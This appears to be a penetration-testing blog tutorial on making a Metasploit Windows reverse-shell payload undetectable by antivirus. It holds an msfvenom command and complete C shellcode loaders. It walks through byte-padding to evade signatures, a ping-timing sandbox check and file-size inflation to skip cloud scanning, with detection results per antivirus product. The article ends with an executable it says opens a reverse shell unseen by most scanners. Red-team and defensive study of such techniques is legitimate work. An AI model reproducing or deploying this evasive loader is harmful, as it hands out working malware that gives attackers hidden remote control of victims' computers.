FUD malware using Metasploit & C
Metasploit is a useful tool that often comes handy while performing penetration testing and red team assessments. It allows us to create payloads in a short time, however, its artifacts often are easily identified and blocked by Antivirus Solutions.
Here I present a simple and fast way to perform Antivirus Evasion. A little C knowledge is needed to understand some of the steps.
The presented approach only works to create a new payload undetected by automatic analysis. For research purposes, we performed analysis using as many free antiviruses as possible. However, it is easy for antivirus software to mark its signature as malicious, therefore you should only analyze your executable with offline antiviruses and should avoid platforms like VirusTotal.
- The base template
- Evade Signature-base detection & Static Analysis
- Evade Dynamic Analysis
- Conclusions
The base template
Use a simple payload to start, I used the command msfvenom -p windows/shell/reverse\_tcpLHOST=192.168.1.166 LPORT=4444 -f C
to generate mine. Then simply place it into the C template.
Use the VirtualAlloc() function to create executable space in memory, then using a for loop copy the shellcode in the just created memory space. A the end, cast the pointer to the copied memory to a function and call it.
#define WIN32_LEAN_AND_MEAN
#include
#define SCSIZE 4096
char payload[SCSIZE] =
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0"
"\x64\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b"
"\x72\x28\x0f\xb7\x4a\x26\x31\xff\xac\x3c\x61"
"\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2"
"\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11"
"\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3"
"\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6"
"\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75"
"\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b"
"\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c"
"\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24"
"\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a"
"\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68"
"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\x89"
"\xe8\xff\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54"
"\x50\x68\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x68"
"\xc0\xa8\x01\xa6\x68\x02\x00\x11\x5c\x89\xe6"
"\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f"
"\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99"
"\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e"
"\x08\x75\xec\xe8\x67\x00\x00\x00\x6a\x00\x6a"
"\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83"
"\xf8\x00\x7e\x36\x8b\x36\x6a\x40\x68\x00\x10"
"\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff"
"\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9"
"\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x68"
"\x00\x40\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f"
"\x30\xff\xd5\x57\x68\x75\x6e\x4d\x61\xff\xd5"
"\x5e\x5e\xff\x0c\x24\x0f\x85\x70\xff\xff\xff"
"\xe9\x9b\xff\xff\xff\x01\xc3\x29\xc6\x75\xc1"
"\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5";
int main(int argc, char* argv[]){
void* p = VirtualAlloc(NULL, SCSIZE, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
char* pp = (char*) p;
char* x = payload;
for(int i = 0; i < SCSIZE; i++)
*pp++ = *x++;
(*(void (*)()) p)();
return 0;
}
Analyzing this executable with some antivirus gave some bad results.
| Antivirus Name | Static detection* | Full detection |
|---|---|---|
| VirusTotal | 28/64 | 28/67 |
| Avast | Win32:Swort-S [Trj] | Win32:Swort-S [Trj] |
| AVG | Win32:Swort-S [Trj] | Win32:Swort-S [Trj] |
| Avira | TR/Meterpreter | TR/Meterpreter |
| BitDefender | Generic.RozenaA | Generic.RozenaA |
| Kaspersky | Trojan.Win32Generic | Trojan.Win32Generic |
| Malwarebytes | No detection | No detection |
| Panda | No detection | No detection |
| Windows Def | Trojan:Win32/Meterp.gen!C | Trojan:Win32/Meterp.gen!C |
Evade Signature-base detection & Static Analysis
It is a common misconception that encrypting a payload using automated tools is sufficient to achieve a good level in antivirus evasion. This is just myth, using encoders that generate polymorphic code could help but usually, even encoders are well known and well detected by antivirus. However, using this them along with their command-line interface’s options might be useful to obtain more control over the generated payload.
In our case, to achieve signature evasion, it was sufficient to use both encoders along with some junk data to make it even harder to match any existing signature.
We generated the new encoded payload using this code. This command creates the desired code without using the byte 0xfa. This characteristic allows us to pollute the shellcode using a bunch of 0xfa, consequently, the end signature is less likely to be already known. Of course, later in the code, while copying the shellcode into the executable space we must make sure to clean it or else it won't execute.
#define WIN32_LEAN_AND_MEAN
#include
#define SCSIZE 4096
char payload[SCSIZE] =
"\xda\xcc\xbd\x00\x9e\xd2\xf3\xd9\x74\x24\xfa"
"\xf4\x5e\x29\xc9\xb1\x93\x31\x6e\x17\x03\xfa"
"\x6e\x17\x83\xc6\x9a\x30\x06\x1f\x49\x0b\xfa"
"\x54\x3b\xdb\x28\x7e\x37\xc0\x24\xde\x9c\xfa"
"\xc1\x74\x53\x61\x17\x72\x5d\x1b\x8c\x78\xfa"
"\xe3\x4a\xea\xde\x9e\x9b\xce\x53\xc5\x30\xfa"
"\x3e\xe7\xf9\x89\x45\x86\xd5\x83\x8a\x6b\xfa"
"\x73\x21\xdd\x56\x8b\xea\x27\xce\x7a\xaf\xfa"
"\xc3\x3b\xd0\xa9\xef\x35\x79\x25\x12\x11\xfa"
"\x2c\xd3\x12\x18\xe2\x4a\x24\xab\x84\x43\xfa"
"\xcf\x82\x48\xeb\x4b\x77\x33\xb7\xb6\x27\xfa"
"\xb9\xd2\x29\x3f\x3f\xe4\x69\x25\x65\x4e\xfa"
"\x92\x1d\x8c\x4f\xd5\x1b\x1e\xbb\xd7\x1c\xfa"
"\x6e\x89\xc3\x39\xc4\xf2\x41\xa9\x5e\x2d\xfa"
"\xdb\x5a\xa2\xf7\xea\xf3\x7f\xf0\xec\x88\xfa"
"\xf7\xba\x73\x79\x60\x3e\x06\x05\x6c\x42\xfa"
"\x5b\x3f\x79\xdf\xa6\x5d\xd9\xf2\x1c\x2f\xfa"
"\x4a\xc3\x9e\x1d\x50\x8f\x8d\x81\x49\x36\xfa"
"\x0b\xe3\x9f\x4a\xf5\x74\x6d\x7a\x0b\x86\xfa"
"\xb1\x3b\x3d\x06\x38\x69\xb9\x53\xe2\x14\xfa"
"\xea\xe5\xa3\x72\x50\x52\xce\x1e\x3a\x02\xfa"
"\x10\x5d\xb6\x85\xdb\x99\x48\x9b\xa8\x46\xfa"
"\x02\x3e\xd3\x64\x11\x6b\x30\xe9\xa3\xad\xfa"
"\xc6\xe5\x72\xd7\x5d\xc5\x30\xae\xd7\xa0\xfa"
"\x0f\x66\xcc\xc0\xb1\x36\x79\xea\x08\x2e\xfa"
"\x5d\x8c\x56\x57\xe7\x07\xe2\x27\xc9\x6b\xfa"
"\x62\xb4\x79\xb4\x68\xf8\x0f\x17\x74\x5a\xfa"
"\x32\x4b\x05\xef\x82\xf2\x80\x82\xd9\x4a\xfa"
"\xd2\xbf\x4c\x90\x80\x92\xd9\x2b\x7f\x73\xfa"
"\x7a\x44\x38\x9d\xb8\xc9\x38\x78\x0e\xc5\xfa"
"\x1f\xa7\xdb\x7a\xba\xa2\xbc\x6d\x12\x84\xfa"
"\x76\x50\x5a\x11\xa2\x4e\x90\x39\x5c\xe0\xfa"
"\xd5\x9b\x3e\xc8\xdc\x69\x5d\x40\x3e\x96\xfa"
"\x4b\xdc\xa5\xaf\x42\xdc\x84\xc9\x99\xc5\xfa"
"\x98\x7a\x2b\x40\x4e\x45\x9c\x7f\xb3\x02\xfa"
"\xa7\x2d\x2c\x1b\xe7\x93\x11\x98\x48\x00\xfa"
"\x87\xa1\x22\x08\xce\x88\x7b\xc8\xc5\xb6\xfa"
"\xce\xde\xfb\xea\x59\x98\x74\x2e\xdd\xd8\xfa"
"\x55\x9b\xe7\x25\x51\x85\x8b\x79\x20\xb0\xfa"
"\xd0\xcd\xc2\xda\xdc\x7e\xd3\x28\xcb\x5a\xfa"
"\xf4\x97\x96\x28\xa2\xe2\xa5\x04\xdc\x9c\xfa"
"\xe0\x7a\xb5\xd1\x96\xe9\x1c\xbe\x81\x8f\xfa"
"\xf4\x4f\x6b\xaa\xae\x9b\xd8\x7a\xe4\xe3\xfa"
"\x7f\xc1\x9f\x53\xc3\xb0\xba\xb4\x50\xd4\xfa"
"\x08\xf7\xc2\x82\x98\x39\x35\xff\x5d\x93\xfa"
"\x34\x8d\x31\xaa\xe9\x13\xff\x7d\xf2\x64\xfa"
"\x3d\x6d\x85\x38\xac\xe1\x4a\x35\x77\x4f\xfa"
"\x09\xb0\x26\x15\x6c\xc7\x8c\xc0\xe2\x46\xfa"
"\xa3\x50\x11\xc1\xb2\x2e\xd0\x36\x8d\x65\xfa"
"\xaa\xbb\xd1\x48\x6e\x39\x09\xbe\x3b\xde\xfa"
"\x42\x56\x2b\x66\x4f\xfb\x7f\x02\xd1\x32\xfa"
"\xc0\x81\xce\xb7\xa0\xb2\x2e\x8b\x75\xa7\xfa"
"\x0d\x2d\x05\xea\x18\x0f\x8c\xb8\x27\x65\xfa"
"\x5c\x4a\x11\xd3\xa9\xce\x14\xa2\xf9\xe0\xfa"
"\x22\xbd\xcd\xcf\x88\xeb\x08\x3b\xf6\xda\xfa"
"\x3b\xe5\xe2\x2b\x38\x6d\xf4\x53\x85\xa8\xfa"
"\xd7\xaa\x4b\x7b\x6b\x91\x42\xfe\x3c\xa6\xfa"
"\x5e\x73\x5b\x04\x8b\x94\xd6\xbb\xb9\xa6\xfa"
"\x37\x1d\x2a\x6d\x58\x0d\x5d\x17\x44\x58\xfa"
"\x96\x79\x46\xf6\x1e\x94\xa3\xc4\x05\x4c\xfa"
"\x5b\xbe\x25\x55\x7d\x92\x3d\x32\xf7\xed\xfa"
"\xe5";
int main(int argc, char* argv[]){
void* p = VirtualAlloc(NULL, SCSIZE, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
char* pp = (char*) p;
char* x = payload;
for(int i = 0; i < SCSIZE; i++){
char v = *x++;
if(v != '\xfa')
*pp++ = v;
}
(*(void (*)()) p)();
return 0;
}
After performing static analysis evasion we manage to sneak trough a lot of antiviruses.
| Antivirus Name | Static detection | Full detection |
|---|---|---|
| VirusTotal | 21/66 | 21/68 |
| Avast | No detection | No detection |
| AVG | No detection | No detection |
| Avira | TR/Meterpreter | TR/Meterpreter |
| BitDefender | No detection | No detection |
| Kaspersky | No detection | No detection |
| Malwarebytes | No detection | No detection |
| Panda | No detection | No detection |
| Windows Def | No detection | Trojan:Win32/Meterp.gen!C |
Evade Dynamic analysis
Dynamic analysis is a method of computer program debugging, in this case, done by the Antivirus, which is accomplished by examining the code executing it, usually in a Virtual Machine.
Simulate a whole operating system to evaluate an executable in just a few instants may not always be so easy. The virtual machine may have some flows and we can exploit them to make the application behave differently while analyzed.
I used a really simple function of sandbox detection. It checks the correct execution of the ping command. We both check that the return value is the expected one and that the command execution correctly takes a minimum time to be executed. There are many other way to perform sandbox evasion.
#define WIN32_LEAN_AND_MEAN
#include
#include
#include
#define SCSIZE 4096
char payload[SCSIZE] =
"\xda\xcc\xbd\x00\x9e\xd2\xf3\xd9\x74\x24\xfa"
"\xf4\x5e\x29\xc9\xb1\x93\x31\x6e\x17\x03\xfa"
"\x6e\x17\x83\xc6\x9a\x30\x06\x1f\x49\x0b\xfa"
"\x54\x3b\xdb\x28\x7e\x37\xc0\x24\xde\x9c\xfa"
"\xc1\x74\x53\x61\x17\x72\x5d\x1b\x8c\x78\xfa"
"\xe3\x4a\xea\xde\x9e\x9b\xce\x53\xc5\x30\xfa"
"\x3e\xe7\xf9\x89\x45\x86\xd5\x83\x8a\x6b\xfa"
"\x73\x21\xdd\x56\x8b\xea\x27\xce\x7a\xaf\xfa"
"\xc3\x3b\xd0\xa9\xef\x35\x79\x25\x12\x11\xfa"
"\x2c\xd3\x12\x18\xe2\x4a\x24\xab\x84\x43\xfa"
"\xcf\x82\x48\xeb\x4b\x77\x33\xb7\xb6\x27\xfa"
"\xb9\xd2\x29\x3f\x3f\xe4\x69\x25\x65\x4e\xfa"
"\x92\x1d\x8c\x4f\xd5\x1b\x1e\xbb\xd7\x1c\xfa"
"\x6e\x89\xc3\x39\xc4\xf2\x41\xa9\x5e\x2d\xfa"
"\xdb\x5a\xa2\xf7\xea\xf3\x7f\xf0\xec\x88\xfa"
"\xf7\xba\x73\x79\x60\x3e\x06\x05\x6c\x42\xfa"
"\x5b\x3f\x79\xdf\xa6\x5d\xd9\xf2\x1c\x2f\xfa"
"\x4a\xc3\x9e\x1d\x50\x8f\x8d\x81\x49\x36\xfa"
"\x0b\xe3\x9f\x4a\xf5\x74\x6d\x7a\x0b\x86\xfa"
"\xb1\x3b\x3d\x06\x38\x69\xb9\x53\xe2\x14\xfa"
"\xea\xe5\xa3\x72\x50\x52\xce\x1e\x3a\x02\xfa"
"\x10\x5d\xb6\x85\xdb\x99\x48\x9b\xa8\x46\xfa"
"\x02\x3e\xd3\x64\x11\x6b\x30\xe9\xa3\xad\xfa"
"\xc6\xe5\x72\xd7\x5d\xc5\x30\xae\xd7\xa0\xfa"
"\x0f\x66\xcc\xc0\xb1\x36\x79\xea\x08\x2e\xfa"
"\x5d\x8c\x56\x57\xe7\x07\xe2\x27\xc9\x6b\xfa"
"\x62\xb4\x79\xb4\x68\xf8\x0f\x17\x74\x5a\xfa"
"\x32\x4b\x05\xef\x82\xf2\x80\x82\xd9\x4a\xfa"
"\xd2\xbf\x4c\x90\x80\x92\xd9\x2b\x7f\x73\xfa"
"\x7a\x44\x38\x9d\xb8\xc9\x38\x78\x0e\xc5\xfa"
"\x1f\xa7\xdb\x7a\xba\xa2\xbc\x6d\x12\x84\xfa"
"\x76\x50\x5a\x11\xa2\x4e\x90\x39\x5c\xe0\xfa"
"\xd5\x9b\x3e\xc8\xdc\x69\x5d\x40\x3e\x96\xfa"
"\x4b\xdc\xa5\xaf\x42\xdc\x84\xc9\x99\xc5\xfa"
"\x98\x7a\x2b\x40\x4e\x45\x9c\x7f\xb3\x02\xfa"
"\xa7\x2d\x2c\x1b\xe7\x93\x11\x98\x48\x00\xfa"
"\x87\xa1\x22\x08\xce\x88\x7b\xc8\xc5\xb6\xfa"
"\xce\xde\xfb\xea\x59\x98\x74\x2e\xdd\xd8\xfa"
"\x55\x9b\xe7\x25\x51\x85\x8b\x79\x20\xb0\xfa"
"\xd0\xcd\xc2\xda\xdc\x7e\xd3\x28\xcb\x5a\xfa"
"\xf4\x97\x96\x28\xa2\xe2\xa5\x04\xdc\x9c\xfa"
"\xe0\x7a\xb5\xd1\x96\xe9\x1c\xbe\x81\x8f\xfa"
"\xf4\x4f\x6b\xaa\xae\x9b\xd8\x7a\xe4\xe3\xfa"
"\x7f\xc1\x9f\x53\xc3\xb0\xba\xb4\x50\xd4\xfa"
"\x08\xf7\xc2\x82\x98\x39\x35\xff\x5d\x93\xfa"
"\x34\x8d\x31\xaa\xe9\x13\xff\x7d\xf2\x64\xfa"
"\x3d\x6d\x85\x38\xac\xe1\x4a\x35\x77\x4f\xfa"
"\x09\xb0\x26\x15\x6c\xc7\x8c\xc0\xe2\x46\xfa"
"\xa3\x50\x11\xc1\xb2\x2e\xd0\x36\x8d\x65\xfa"
"\xaa\xbb\xd1\x48\x6e\x39\x09\xbe\x3b\xde\xfa"
"\x42\x56\x2b\x66\x4f\xfb\x7f\x02\xd1\x32\xfa"
"\xc0\x81\xce\xb7\xa0\xb2\x2e\x8b\x75\xa7\xfa"
"\x0d\x2d\x05\xea\x18\x0f\x8c\xb8\x27\x65\xfa"
"\x5c\x4a\x11\xd3\xa9\xce\x14\xa2\xf9\xe0\xfa"
"\x22\xbd\xcd\xcf\x88\xeb\x08\x3b\xf6\xda\xfa"
"\x3b\xe5\xe2\x2b\x38\x6d\xf4\x53\x85\xa8\xfa"
"\xd7\xaa\x4b\x7b\x6b\x91\x42\xfe\x3c\xa6\xfa"
"\x5e\x73\x5b\x04\x8b\x94\xd6\xbb\xb9\xa6\xfa"
"\x37\x1d\x2a\x6d\x58\x0d\x5d\x17\x44\x58\xfa"
"\x96\x79\x46\xf6\x1e\x94\xa3\xc4\x05\x4c\xfa"
"\x5b\xbe\x25\x55\x7d\x92\x3d\x32\xf7\xed\xfa"
"\xe5";
int sandboxDetected(){
time_t startPing, endPing;
time(&startPing);
if(
system("ping -n 1 -w 1500 10.0.0.1") != 1
)
return 1;
time(&endPing);
if(
difftime(endPing, startPing) < 1
)
return 1;
return 0;
}
int main(int argc, char* argv[]){
if(sandboxDetected()) return 0;
void* p = VirtualAlloc(NULL, SCSIZE, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
char* pp = (char*) p;
char* x = payload;
for(int i = 0; i < SCSIZE; i++){
char v = *x++;
if(v != '\xfa')
*pp++ = v;
}
(*(void (*)()) p)();
return 0;
}
Using this function we've been able to evade Windows Defender sandbox and some of the sandbox of VirusTotal.
| Antivirus Name | Full detection |
|---|---|
| VirusTotal | 12/66 |
| Avast | No detection |
| AVG | No detection |
| Avira | TR/Meterpreter |
| BitDefender | No detection |
| Kaspersky | No detection |
| Malwarebytes | No detection |
| Panda | No detection |
| Windows Def | No detection |
Conclusions
In the end, only Avira seemed to still be able to detect the file. After some investigation, we noticed that it was happening because small files are sent onto the cloud for further analysis.
Increasing the file size is enough to bypass even this last check.
#define WIN32_LEAN_AND_MEAN
#include
#include
#include
#define SCSIZE 4096
#define MIN_FILE_LEN 7050000
char sizeManagmentArray[MIN_FILE_LEN] = "a";
char payload[SCSIZE] =
"\xda\xcc\xbd\x00\x9e\xd2\xf3\xd9\x74\x24\xfa"
"\xf4\x5e\x29\xc9\xb1\x93\x31\x6e\x17\x03\xfa"
"\x6e\x17\x83\xc6\x9a\x30\x06\x1f\x49\x0b\xfa"
"\x54\x3b\xdb\x28\x7e\x37\xc0\x24\xde\x9c\xfa"
"\xc1\x74\x53\x61\x17\x72\x5d\x1b\x8c\x78\xfa"
"\xe3\x4a\xea\xde\x9e\x9b\xce\x53\xc5\x30\xfa"
"\x3e\xe7\xf9\x89\x45\x86\xd5\x83\x8a\x6b\xfa"
"\x73\x21\xdd\x56\x8b\xea\x27\xce\x7a\xaf\xfa"
"\xc3\x3b\xd0\xa9\xef\x35\x79\x25\x12\x11\xfa"
"\x2c\xd3\x12\x18\xe2\x4a\x24\xab\x84\x43\xfa"
"\xcf\x82\x48\xeb\x4b\x77\x33\xb7\xb6\x27\xfa"
"\xb9\xd2\x29\x3f\x3f\xe4\x69\x25\x65\x4e\xfa"
"\x92\x1d\x8c\x4f\xd5\x1b\x1e\xbb\xd7\x1c\xfa"
"\x6e\x89\xc3\x39\xc4\xf2\x41\xa9\x5e\x2d\xfa"
"\xdb\x5a\xa2\xf7\xea\xf3\x7f\xf0\xec\x88\xfa"
"\xf7\xba\x73\x79\x60\x3e\x06\x05\x6c\x42\xfa"
"\x5b\x3f\x79\xdf\xa6\x5d\xd9\xf2\x1c\x2f\xfa"
"\x4a\xc3\x9e\x1d\x50\x8f\x8d\x81\x49\x36\xfa"
"\x0b\xe3\x9f\x4a\xf5\x74\x6d\x7a\x0b\x86\xfa"
"\xb1\x3b\x3d\x06\x38\x69\xb9\x53\xe2\x14\xfa"
"\xea\xe5\xa3\x72\x50\x52\xce\x1e\x3a\x02\xfa"
"\x10\x5d\xb6\x85\xdb\x99\x48\x9b\xa8\x46\xfa"
"\x02\x3e\xd3\x64\x11\x6b\x30\xe9\xa3\xad\xfa"
"\xc6\xe5\x72\xd7\x5d\xc5\x30\xae\xd7\xa0\xfa"
"\x0f\x66\xcc\xc0\xb1\x36\x79\xea\x08\x2e\xfa"
"\x5d\x8c\x56\x57\xe7\x07\xe2\x27\xc9\x6b\xfa"
"\x62\xb4\x79\xb4\x68\xf8\x0f\x17\x74\x5a\xfa"
"\x32\x4b\x05\xef\x82\xf2\x80\x82\xd9\x4a\xfa"
"\xd2\xbf\x4c\x90\x80\x92\xd9\x2b\x7f\x73\xfa"
"\x7a\x44\x38\x9d\xb8\xc9\x38\x78\x0e\xc5\xfa"
"\x1f\xa7\xdb\x7a\xba\xa2\xbc\x6d\x12\x84\xfa"
"\x76\x50\x5a\x11\xa2\x4e\x90\x39\x5c\xe0\xfa"
"\xd5\x9b\x3e\xc8\xdc\x69\x5d\x40\x3e\x96\xfa"
"\x4b\xdc\xa5\xaf\x42\xdc\x84\xc9\x99\xc5\xfa"
"\x98\x7a\x2b\x40\x4e\x45\x9c\x7f\xb3\x02\xfa"
"\xa7\x2d\x2c\x1b\xe7\x93\x11\x98\x48\x00\xfa"
"\x87\xa1\x22\x08\xce\x88\x7b\xc8\xc5\xb6\xfa"
"\xce\xde\xfb\xea\x59\x98\x74\x2e\xdd\xd8\xfa"
"\x55\x9b\xe7\x25\x51\x85\x8b\x79\x20\xb0\xfa"
"\xd0\xcd\xc2\xda\xdc\x7e\xd3\x28\xcb\x5a\xfa"
"\xf4\x97\x96\x28\xa2\xe2\xa5\x04\xdc\x9c\xfa"
"\xe0\x7a\xb5\xd1\x96\xe9\x1c\xbe\x81\x8f\xfa"
"\xf4\x4f\x6b\xaa\xae\x9b\xd8\x7a\xe4\xe3\xfa"
"\x7f\xc1\x9f\x53\xc3\xb0\xba\xb4\x50\xd4\xfa"
"\x08\xf7\xc2\x82\x98\x39\x35\xff\x5d\x93\xfa"
"\x34\x8d\x31\xaa\xe9\x13\xff\x7d\xf2\x64\xfa"
"\x3d\x6d\x85\x38\xac\xe1\x4a\x35\x77\x4f\xfa"
"\x09\xb0\x26\x15\x6c\xc7\x8c\xc0\xe2\x46\xfa"
"\xa3\x50\x11\xc1\xb2\x2e\xd0\x36\x8d\x65\xfa"
"\xaa\xbb\xd1\x48\x6e\x39\x09\xbe\x3b\xde\xfa"
"\x42\x56\x2b\x66\x4f\xfb\x7f\x02\xd1\x32\xfa"
"\xc0\x81\xce\xb7\xa0\xb2\x2e\x8b\x75\xa7\xfa"
"\x0d\x2d\x05\xea\x18\x0f\x8c\xb8\x27\x65\xfa"
"\x5c\x4a\x11\xd3\xa9\xce\x14\xa2\xf9\xe0\xfa"
"\x22\xbd\xcd\xcf\x88\xeb\x08\x3b\xf6\xda\xfa"
"\x3b\xe5\xe2\x2b\x38\x6d\xf4\x53\x85\xa8\xfa"
"\xd7\xaa\x4b\x7b\x6b\x91\x42\xfe\x3c\xa6\xfa"
"\x5e\x73\x5b\x04\x8b\x94\xd6\xbb\xb9\xa6\xfa"
"\x37\x1d\x2a\x6d\x58\x0d\x5d\x17\x44\x58\xfa"
"\x96\x79\x46\xf6\x1e\x94\xa3\xc4\x05\x4c\xfa"
"\x5b\xbe\x25\x55\x7d\x92\x3d\x32\xf7\xed\xfa"
"\xe5";
int sandboxDetected(){
time_t startPing, endPing;
time(&startPing);
if(
system("ping -n 1 -w 1500 10.0.0.1") != 1
)
return 1;
time(&endPing);
if(
difftime(endPing, startPing) < 1
)
return 1;
return 0;
}
int main(int argc, char* argv[]){
if(sandboxDetected()) return 0;
void* p = VirtualAlloc(NULL, SCSIZE, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
char* pp = (char*) p;
char* x = payload;
for(int i = 0; i < SCSIZE; i++){
char v = *x++;
if(v != '\xfa')
*pp++ = v;
}
(*(void (*)()) p)();
return 0;
}
Finally we remain with an executable that opens a reverse shell completely ignored by antivirus. Our last modification also improved our score on VirusTotal.
| Antivirus Name | Full detection |
|---|---|
| VirusTotal | 9/66 |
| Avast | No detection |
| AVG | No detection |
| Avira | No detection |
| BitDefender | No detection |
| Kaspersky | No detection |
| Malwarebytes | No detection |
| Panda | No detection |
| Windows Def | No detection |
Checkout the full presentation in Italian at this link.